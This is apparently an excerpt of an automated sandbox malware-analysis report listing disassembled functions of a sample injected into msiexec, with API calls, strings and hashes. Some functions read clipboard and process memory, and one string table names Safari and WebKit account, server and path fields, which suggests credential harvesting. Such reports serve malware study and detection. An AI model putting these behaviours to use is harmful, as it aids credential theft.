                                                                                        • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                        • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                        Function 004068BF Relevance: 1.3, APIs: 1, Instructions: 59COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                          • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                        • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ??2@FilePointermemcpy
                                                                                        • String ID:
                                                                                        • API String ID: 609303285-0
                                                                                        • Opcode ID: 9e8b65249caf6329f4b4caa46943be568ceb14fc1399993bad7d332d27558272
                                                                                        • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                        • Opcode Fuzzy Hash: 9e8b65249caf6329f4b4caa46943be568ceb14fc1399993bad7d332d27558272
                                                                                        • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                        Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                          • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                        • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                          • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$CloseCreateErrorHandleLastRead
                                                                                        • String ID:
                                                                                        • API String ID: 2136311172-0
                                                                                        • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                        • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                        • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                        • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                        Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ??2@??3@
                                                                                        • String ID:
                                                                                        • API String ID: 1936579350-0
                                                                                        • Opcode ID: 89281d6a79f9a2f09b4aea459eeecc0a1f6d8faaa22ddda06fad7d30ca0037ac
                                                                                        • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                        • Opcode Fuzzy Hash: 89281d6a79f9a2f09b4aea459eeecc0a1f6d8faaa22ddda06fad7d30ca0037ac
                                                                                        • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                        Function 0040B633 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: free
                                                                                        • String ID:
                                                                                        • API String ID: 1294909896-0
                                                                                        • Opcode ID: 4de95ac81b56fc95cb4562d00445ef5fa655241d3aefb31a5f850866e19148c6
                                                                                        • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                        • Opcode Fuzzy Hash: 4de95ac81b56fc95cb4562d00445ef5fa655241d3aefb31a5f850866e19148c6
                                                                                        • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                        Function 0040AA04 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: free
                                                                                        • String ID:
                                                                                        • API String ID: 1294909896-0
                                                                                        • Opcode ID: d947284d6c22db8237c76381862de6f07fb40d788dfda0aa2648abdb68a845b9
                                                                                        • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                        • Opcode Fuzzy Hash: d947284d6c22db8237c76381862de6f07fb40d788dfda0aa2648abdb68a845b9
                                                                                        • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                        Function 00415304 Relevance: 1.3, APIs: 1, Instructions: 6COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: free
                                                                                        • String ID:
                                                                                        • API String ID: 1294909896-0
                                                                                        • Opcode ID: e156b31a0a4016bb8d4295fdb5f94758c26aaa1bdb159141442c644a924158d2
                                                                                        • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                                        • Opcode Fuzzy Hash: e156b31a0a4016bb8d4295fdb5f94758c26aaa1bdb159141442c644a924158d2
                                                                                        • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E

                                                                                        Non-executed Functions

                                                                                        Function 004098E2 Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • EmptyClipboard.USER32 ref: 004098EC
                                                                                          • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                        • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                        • GetLastError.KERNEL32 ref: 0040995D
                                                                                        • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                        • GetLastError.KERNEL32 ref: 00409974
                                                                                        • CloseClipboard.USER32 ref: 0040997D
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                        • String ID:
                                                                                        • API String ID: 3604893535-0
                                                                                        • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                        • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                        • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                        • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                        Function 004044A4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                        • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                        • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$AddressFreeLoadMessageProc
                                                                                        • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                        • API String ID: 2780580303-317687271
                                                                                        • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                        • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                        • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                        • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                        Function 0040987A Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • EmptyClipboard.USER32 ref: 00409882
                                                                                        • wcslen.MSVCRT ref: 0040988F
                                                                                        • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                        • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                        • CloseClipboard.USER32 ref: 004098D7
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                        • String ID:
                                                                                        • API String ID: 1213725291-0
                                                                                        • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                        • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                        • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                        • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                        Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32 ref: 004182D7
                                                                                          • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                        • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                        • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                        • LocalFree.KERNEL32(?), ref: 00418342
                                                                                        • free.MSVCRT ref: 00418370
                                                                                          • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7622DF80,?,0041755F,?), ref: 00417452
                                                                                          • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                        • String ID: OsError 0x%x (%u)
                                                                                        • API String ID: 2360000266-2664311388
                                                                                        • Opcode ID: 78d2135784b36f3903f9871ee7adf38e4db2590f8e5e3f290b233798c2ec08b4
                                                                                        • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                        • Opcode Fuzzy Hash: 78d2135784b36f3903f9871ee7adf38e4db2590f8e5e3f290b233798c2ec08b4
                                                                                        • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                        Function 0041183A Relevance: 3.0, APIs: 2, Instructions: 44clipboardCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                          • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                          • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                        • OpenClipboard.USER32(?), ref: 00411878
                                                                                        • GetLastError.KERNEL32 ref: 0041188D
                                                                                          • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                                                                                          • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                          • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                          • Part of subcall function 004098E2: GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                          • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                          • Part of subcall function 004098E2: GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                          • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                          • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                                                                                          • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Clipboard$FileGlobal$CloseTemp$AllocDataDirectoryEmptyErrorHandleLastLockNameOpenPathReadSizeUnlockWindows
                                                                                        • String ID:
                                                                                        • API String ID: 2628231878-0
                                                                                        • Opcode ID: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                                        • Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
                                                                                        • Opcode Fuzzy Hash: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                                        • Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
                                                                                        Function 00401806 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ??2@??3@memcpymemset
                                                                                        • String ID:
                                                                                        • API String ID: 1865533344-0
                                                                                        • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                        • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                                        • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                        • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                                        Function 0041739B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Version
                                                                                        • String ID:
                                                                                        • API String ID: 1889659487-0
                                                                                        • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                        • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                                                        • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                        • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                                                        Function 004018C0 Relevance: 1.5, APIs: 1, Instructions: 6nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: NtdllProc_Window
                                                                                        • String ID:
                                                                                        • API String ID: 4255912815-0
                                                                                        • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                        • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                                        • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                        • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                                        Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _wcsicmp.MSVCRT ref: 004022A6
                                                                                        • _wcsicmp.MSVCRT ref: 004022D7
                                                                                        • _wcsicmp.MSVCRT ref: 00402305
                                                                                        • _wcsicmp.MSVCRT ref: 00402333
                                                                                          • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                          • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                        • memset.MSVCRT ref: 0040265F
                                                                                        • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                          • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                          • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                        • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                        • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                                                        • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                        • API String ID: 577499730-1134094380
                                                                                        • Opcode ID: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                        • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                        • Opcode Fuzzy Hash: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                        • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                        Function 0040C87B Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 285stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                        • String ID: :stringdata$ftp://$http://$https://
                                                                                        • API String ID: 2787044678-1921111777
                                                                                        • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                        • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                        • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                        • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                        Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                        • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                        • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                        • GetDC.USER32 ref: 004140E3
                                                                                        • wcslen.MSVCRT ref: 00414123
                                                                                        • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                        • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                        • _snwprintf.MSVCRT ref: 00414244
                                                                                        • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                        • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                        • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                        • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                        • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                        • String ID: %s:$EDIT$STATIC
                                                                                        • API String ID: 2080319088-3046471546
                                                                                        • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                        • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                        • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                        • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                        Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • EndDialog.USER32(?,?), ref: 00413221
                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                        • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                        • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                        • memset.MSVCRT ref: 00413292
                                                                                        • memset.MSVCRT ref: 004132B4
                                                                                        • memset.MSVCRT ref: 004132CD
                                                                                        • memset.MSVCRT ref: 004132E1
                                                                                        • memset.MSVCRT ref: 004132FB
                                                                                        • memset.MSVCRT ref: 00413310
                                                                                        • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                        • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                        • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                        • memset.MSVCRT ref: 004133C0
                                                                                        • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                        • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                        • wcscpy.MSVCRT ref: 0041341F
                                                                                        • _snwprintf.MSVCRT ref: 0041348E
                                                                                        • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                        • SetFocus.USER32(00000000), ref: 004134B7
                                                                                        Strings
                                                                                        • {Unknown}, xrefs: 004132A6
                                                                                        • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
